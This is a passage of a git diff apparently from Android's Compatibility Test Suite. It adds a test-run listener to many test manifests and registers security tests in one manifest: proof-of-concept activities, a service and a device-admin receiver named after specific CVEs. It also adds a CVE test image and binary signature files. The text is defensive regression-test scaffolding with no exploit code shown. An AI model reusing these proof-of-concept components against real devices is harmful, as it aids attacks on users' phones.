android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.service.resolver.cts"
android:label="CTS tests of android.service.resolver">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/resourcesloader/AndroidManifest.xml b/tests/tests/resourcesloader/AndroidManifest.xml
index 98db265..ecad33e 100644
--- a/tests/tests/resourcesloader/AndroidManifest.xml
+++ b/tests/tests/resourcesloader/AndroidManifest.xml
@@ -33,5 +33,7 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.res.loader.cts"
android:label="CTS tests of android.content.res.loader.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/role/AndroidManifest.xml b/tests/tests/role/AndroidManifest.xml
index a69caf1..5389863 100644
--- a/tests/tests/role/AndroidManifest.xml
+++ b/tests/tests/role/AndroidManifest.xml
@@ -34,5 +34,7 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.role.cts"
android:label="CTS tests of android.app.role">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/rsblas/AndroidManifest.xml b/tests/tests/rsblas/AndroidManifest.xml
index 2b8dc40..cf27505 100644
--- a/tests/tests/rsblas/AndroidManifest.xml
+++ b/tests/tests/rsblas/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.rsblas"
android:label="CTS tests of RenderScript IntrinsicBLAS">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/rscpp/AndroidManifest.xml b/tests/tests/rscpp/AndroidManifest.xml
index 34bf54c..da6084b 100644
--- a/tests/tests/rscpp/AndroidManifest.xml
+++ b/tests/tests/rscpp/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.rscpp.cts"
android:label="CTS tests of RenderScript C++ component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/sax/AndroidManifest.xml b/tests/tests/sax/AndroidManifest.xml
index 98b49b0..0a7a92b 100644
--- a/tests/tests/sax/AndroidManifest.xml
+++ b/tests/tests/sax/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sax.cts"
android:label="CTS tests of android.sax">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
index 0dee704..8ef3068 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp1/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol1.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
index b2abfd1..65b23a6 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp2/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol2.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
index a35597f..fdaafdf 100644
--- a/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
+++ b/tests/tests/secure_element/access_control/AccessControlApp3/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.accesscontrol3.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/secure_element/omapi/AndroidManifest.xml b/tests/tests/secure_element/omapi/AndroidManifest.xml
index 341984fc..3743155 100644
--- a/tests/tests/secure_element/omapi/AndroidManifest.xml
+++ b/tests/tests/secure_element/omapi/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for Open Mobile API"
android:targetPackage="android.omapi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 0ccc832..f8d882b 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -38,6 +38,9 @@
<!-- For FileIntegrityManager -->
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
+ <!-- CVE-2023-21143 -->
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
<application android:usesCleartextTraffic="true">
<uses-library android:name="android.test.runner"/>
<uses-library android:name="org.apache.http.legacy"
@@ -200,7 +203,14 @@
android:grantUriPermissions="true"
android:process=":badprovider" />
- <activity android:name="android.security.cts.CVE_2022_20143.PocActivity"
+ <activity android:name="android.security.cts.AutomaticZenRuleTests.PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.AutomaticZenRuleTests.SecondPocActivity"
android:exported="true">
<intent-filter>
<action android:name="android.app.action.AUTOMATIC_ZEN_RULE"/>
@@ -219,6 +229,7 @@
<activity android:name="android.security.cts.ActivityManagerTest$ActivityOptionsActivity" />
<activity android:name="android.security.cts.ActivityManagerTest$BaseActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$WaitEnterAnimActivity" />
<activity android:name="android.security.cts.PackageInstallerTest$BackgroundLaunchActivity"
android:exported="true" />
@@ -240,6 +251,15 @@
android:resource="@xml/syncadapter" />
</service>
+ <service
+ android:name="android.security.cts.CVE_2022_20129.PocService"
+ android:exported="true"
+ android:permission="android.permission.BIND_TELECOM_CONNECTION_SERVICE">
+ <intent-filter>
+ <action android:name="android.telecom.ConnectionService"/>
+ </intent-filter>
+ </service>
+
<activity android:name="android.security.cts.CVE_2023_20953.PocActivity"
android:exported="true" />
@@ -263,6 +283,27 @@
</intent-filter>
</activity>
+ <activity android:name="android.security.cts.CVE_2023_20916.PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0600.PocActivity" />
+
+ <receiver android:name="android.security.cts.CVE_2021_0600.PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data
+ android:name="android.app.device_admin"
+ android:resource="@xml/device_admin_cve_2021_0600" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+
<service android:name="android.security.cts.AttributionSourceService"
android:enabled="true"
android:exported="true"
@@ -270,11 +311,15 @@
android:process=":attributionSourceServiceProcess">
</service>
+ <activity android:name="android.security.cts.CVE_2022_20429.PocActivity" />
+
</application>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.cts"
android:label="CTS tests of android.security.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.cts"
diff --git a/tests/tests/security/res/layout/cve_2023_21143.xml b/tests/tests/security/res/layout/cve_2023_21143.xml
new file mode 100644
index 0000000..d8c6845
--- /dev/null
+++ b/tests/tests/security/res/layout/cve_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <ImageView
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:src="@raw/cve_2023_21143" />
+
+</LinearLayout>
diff --git a/tests/tests/security/res/raw/cve_2023_21143.png b/tests/tests/security/res/raw/cve_2023_21143.png
new file mode 100644
index 0000000..ce0fc57
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2023_21143.png
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
new file mode 100644
index 0000000..7e2dc3e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_android_telephony_cts_testkey.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
new file mode 100644
index 0000000..5add3a7
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_build_bazel_examples_apex_minimal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cert.bin b/tests/tests/security/res/raw/sig_cert.bin
new file mode 100644
index 0000000..f42b8ae
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adbd.bin b/tests/tests/security/res/raw/sig_com_android_adbd.bin
new file mode 100644
index 0000000..aceb985
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adbd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices.bin b/tests/tests/security/res/raw/sig_com_android_adservices.bin
new file mode 100644
index 0000000..b5b920b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_adservices_api.bin b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
new file mode 100644
index 0000000..d5c4a29
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_adservices_api.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_appsearch.bin b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
new file mode 100644
index 0000000..f133a7b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_appsearch.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_art.bin b/tests/tests/security/res/raw/sig_com_android_art.bin
new file mode 100644
index 0000000..508c56c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_art.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_bluetooth.bin b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
new file mode 100644
index 0000000..3d397c0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_bluetooth.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_btservices.bin b/tests/tests/security/res/raw/sig_com_android_btservices.bin
new file mode 100644
index 0000000..9ee766c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_btservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_car_framework.bin b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
new file mode 100644
index 0000000..f3b7e78
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_car_framework.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
new file mode 100644
index 0000000..bad7b6c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_cellbroadcast.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_compos.bin b/tests/tests/security/res/raw/sig_com_android_compos.bin
new file mode 100644
index 0000000..d4ba69a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_compos.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
new file mode 100644
index 0000000..e89a552
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_connectivity_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_extservices.bin b/tests/tests/security/res/raw/sig_com_android_extservices.bin
new file mode 100644
index 0000000..790edbb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_extservices.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_geotz.bin b/tests/tests/security/res/raw/sig_com_android_geotz.bin
new file mode 100644
index 0000000..aa9479a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_geotz.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
new file mode 100644
index 0000000..1ac04ee
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_core_permissions.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_power.bin b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
new file mode 100644
index 0000000..7db8788
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_power.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
new file mode 100644
index 0000000..c3f2e2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_sensors.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
new file mode 100644
index 0000000..03b7c44
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_thermal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
new file mode 100644
index 0000000..7a892d8
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_usb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
new file mode 100644
index 0000000..d331763
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_vibrator.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
new file mode 100644
index 0000000..9b0f190
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hardware_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
new file mode 100644
index 0000000..2bb4b5a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_hotspot2_osulogin.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_i18n.bin b/tests/tests/security/res/raw/sig_com_android_i18n.bin
new file mode 100644
index 0000000..6bcf8ec
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_i18n.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_ipsec.bin b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
new file mode 100644
index 0000000..319484a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_ipsec.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
new file mode 100644
index 0000000..c87618f
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_mediaprovider.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
new file mode 100644
index 0000000..05cb7b9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_neuralnetworks.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_os_statsd.bin b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
new file mode 100644
index 0000000..ed8693b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_os_statsd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_permission.bin b/tests/tests/security/res/raw/sig_com_android_permission.bin
new file mode 100644
index 0000000..e9e5a69
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_permission.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_rkpd.bin b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
new file mode 100644
index 0000000..c49bfd0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_rkpd.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_runtime.bin b/tests/tests/security/res/raw/sig_com_android_runtime.bin
new file mode 100644
index 0000000..e59f0f3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_runtime.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
new file mode 100644
index 0000000..d9f97a4
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_safetycenter_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_sdkext.bin b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
new file mode 100644
index 0000000..26a9b92
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_sdkext.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb.bin b/tests/tests/security/res/raw/sig_com_android_uwb.bin
new file mode 100644
index 0000000..1118522
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
new file mode 100644
index 0000000..55f326c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_uwb_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
new file mode 100644
index 0000000..cd7e33c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_drv2624.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
new file mode 100644
index 0000000..42e01d6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vibrator_sunfish.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_virt.bin b/tests/tests/security/res/raw/sig_com_android_virt.bin
new file mode 100644
index 0000000..89c91e3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_virt.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_vndk.bin b/tests/tests/security/res/raw/sig_com_android_vndk.bin
new file mode 100644
index 0000000..e6b006b
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_vndk.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi.bin b/tests/tests/security/res/raw/sig_com_android_wifi.bin
new file mode 100644
index 0000000..469ee37
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
new file mode 100644
index 0000000..1fc37eb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_dialog.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
new file mode 100644
index 0000000..09016e0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_cf_apex.bin b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
new file mode 100644
index 0000000..f894bf6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
new file mode 100644
index 0000000..e011b62
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
new file mode 100644
index 0000000..af5d313
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
new file mode 100644
index 0000000..d8fcc87
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
new file mode 100644
index 0000000..c8c1806
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
new file mode 100644
index 0000000..802cbc0e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
new file mode 100644
index 0000000..6e4c311
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
new file mode 100644
index 0000000..35347a6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
new file mode 100644
index 0000000..4d22159
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
new file mode 100644
index 0000000..dbeeefd
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
new file mode 100644
index 0000000..265ac9a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
new file mode 100644
index 0000000..356a5ab
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_net_app.bin b/tests/tests/security/res/raw/sig_cts_net_app.bin
new file mode 100644
index 0000000..ff683ed
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_net_app.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey1.bin b/tests/tests/security/res/raw/sig_cts_testkey1.bin
new file mode 100644
index 0000000..ca90fe2
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey2.bin b/tests/tests/security/res/raw/sig_cts_testkey2.bin
new file mode 100644
index 0000000..4371c21
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_uicc_2021.bin b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
new file mode 100644
index 0000000..7125291
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256.bin b/tests/tests/security/res/raw/sig_ec_p256.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_2.bin b/tests/tests/security/res/raw/sig_ec_p256_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_3.bin b/tests/tests/security/res/raw/sig_ec_p256_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_4.bin b/tests/tests/security/res/raw/sig_ec_p256_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_5.bin b/tests/tests/security/res/raw/sig_ec_p256_5.bin
new file mode 100644
index 0000000..e62d5bb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_5.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_A.bin b/tests/tests/security/res/raw/sig_keyset_A.bin
new file mode 100644
index 0000000..e484ec3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_A.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_B.bin b/tests/tests/security/res/raw/sig_keyset_B.bin
new file mode 100644
index 0000000..b95719c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_B.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
new file mode 100644
index 0000000..24d2d55
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rsa_2048.bin b/tests/tests/security/res/raw/sig_rsa_2048.bin
new file mode 100644
index 0000000..d61baef
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rsa_2048.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_sdk_sandbox.bin b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
new file mode 100644
index 0000000..3b01c2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_security_cts_test_cert.bin b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
new file mode 100644
index 0000000..e62cbff
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
new file mode 100644
index 0000000..be5aab5
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_1.bin b/tests/tests/security/res/raw/sig_test_cert_1.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_2.bin b/tests/tests/security/res/raw/sig_test_cert_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_3.bin b/tests/tests/security/res/raw/sig_test_cert_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_4.bin b/tests/tests/security/res/raw/sig_test_cert_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
